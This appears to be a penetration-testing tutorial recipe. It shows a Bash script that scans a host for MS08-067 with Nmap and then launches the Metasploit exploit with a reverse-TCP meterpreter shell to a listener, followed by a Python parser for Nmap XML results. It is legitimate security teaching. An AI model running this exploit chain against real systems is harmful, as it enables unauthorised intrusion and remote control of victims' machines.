How to do it...

The example that follows demonstrates how a Bash script can be used to sequence together the tasks of vulnerability scanning and target exploitation. In this case, the smb-vuln-ms08-067.nse script is used to determine whether a system is vulnerable to the MS08-067 attack, and then the corresponding Metasploit exploit is executed against the system if it is found to be vulnerable:

#! /bin/bash

# Require all three arguments rather than testing only the first one
if [ $# -ne 3 ]; then echo "Usage: ./test_n_xploit.sh <RHOST> <LHOST> <LPORT>"; exit 1; fi

rhost=$1   # IP address of the target
lhost=$2   # IP address of the reverse listener
lport=$3   # port the reverse listener is bound to

# Run the NSE check against TCP/445 and save the normal-format output to a temporary file
nmap --script smb-vuln-ms08-067.nse -p 445 "$rhost" --script-args=unsafe=1 -oN tmp_output.txt

# The "VULNERABLE:" header is printed only when the check reports a positive finding
if grep -q VULNERABLE: tmp_output.txt;
then echo "$rhost appears to be vulnerable, exploiting with Metasploit...";
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST $rhost; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST $lhost; set LPORT $lport; run"
fi

# Remove the temporary Nmap output file whether or not the exploit was launched
rm tmp_output.txt
  1. To ensure that the script's functionality is understood, we will address each line in sequence:
    • The first few lines in the script are the same as in the scripts previously discussed in this chapter. The first line defines the interpreter, the second line tests for input, and the third, fourth, and fifth lines define the variables based on user input.
    • In this script, the supplied user variables correspond to the variables that are used in Metasploit. The RHOST variable defines the IP address of the target, the LHOST variable defines the IP address of the reverse listener, and the LPORT variable defines the local port on which the listener is waiting.
    • The first task that the script performs in the body is to execute the smb-vuln-ms08-067.nse script against the IP address of the target system, as defined by the RHOST input.
    • The results of this scan are output in normal format to a temporary text file.
    • An if...then conditional statement is then used in conjunction with the grep command to test the output file for a unique string that indicates that the system is vulnerable. If the unique string is found, the script reports that the system appears to be vulnerable and then executes the Metasploit exploit and meterpreter payload using msfconsole -x.
    • Finally, after the exploit is launched, the temporary Nmap output file is removed from the filesystem using the rm command. The test_n_xploit.sh Bash script is executed as follows:
  2. If the script is executed without supplying any arguments, it outputs the appropriate usage. This usage description indicates that the script should be executed with the arguments RHOST, LHOST, and LPORT, in that order. These input values are used for both the NSE vulnerability scan and, if warranted, the execution of the exploit on the target system using Metasploit.
  3. In the following example, the script is used to determine whether the host at IP address 172.16.69.129 is vulnerable. If the system is determined to be vulnerable, the exploit is launched and connects back to a reverse TCP meterpreter handler that is listening on the system at IP address 172.16.69.133 on TCP port 4444:

The preceding output shows that immediately upon completion of the NSE script, the Metasploit exploit module is executed, and an interactive meterpreter shell is returned on the target system.
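As an added example (not part of the original recipe), the following Python check replaces the grep on normal-format output with a parse of Nmap's XML output (-oX) and matches the exact state string the NSE vulns library reports, so that a "NOT VULNERABLE" finding is never mistaken for a hit. The XML sample is constructed; its element layout (one table per finding carrying a "state" element) is assumed to follow the vulns library, and the host addresses and table key are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output (-oX) for two scanned hosts.
# Element layout is assumed to follow the NSE vulns library: one <table>
# per finding, each carrying a "state" element. Addresses are placeholders.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><address addr="192.0.2.10" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms08-067" output="VULNERABLE: ...">
        <table key="ms08-067">
          <elem key="title">Remote code execution (MS08-067)</elem>
          <elem key="state">VULNERABLE</elem>
        </table></script></port></ports></host>
  <host><address addr="192.0.2.11" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms08-067" output="NOT VULNERABLE: ...">
        <table key="ms08-067">
          <elem key="state">NOT VULNERABLE</elem>
        </table></script></port></ports></host>
</nmaprun>
"""

# Exact state strings the vulns library uses for a positive finding; a plain
# substring test for "VULNERABLE" would also match "NOT VULNERABLE".
VULNERABLE_STATES = {"VULNERABLE", "VULNERABLE (Exploitable)",
                     "VULNERABLE (DoS)", "LIKELY VULNERABLE"}

def vulnerable_hosts(xml_text, script_id="smb-vuln-ms08-067"):
    """Return {ipv4: state} for hosts where script_id reports a vulnerable state."""
    found = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != script_id:
                continue
            for elem in script.iter("elem"):
                state = (elem.text or "").strip()
                if elem.get("key") == "state" and state in VULNERABLE_STATES:
                    found[addr.get("addr")] = state
    return found

def is_vulnerable(xml_text, rhost):
    """Gate for the exploit step: True only on an exact vulnerable state for rhost."""
    return rhost in vulnerable_hosts(xml_text)

if __name__ == "__main__":
    print(vulnerable_hosts(SAMPLE_XML))  # {'192.0.2.10': 'VULNERABLE'}
```

In the Bash recipe this would replace the grep test: scan with -oX instead of -oN and gate the msfconsole step on is_vulnerable() for the supplied RHOST.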
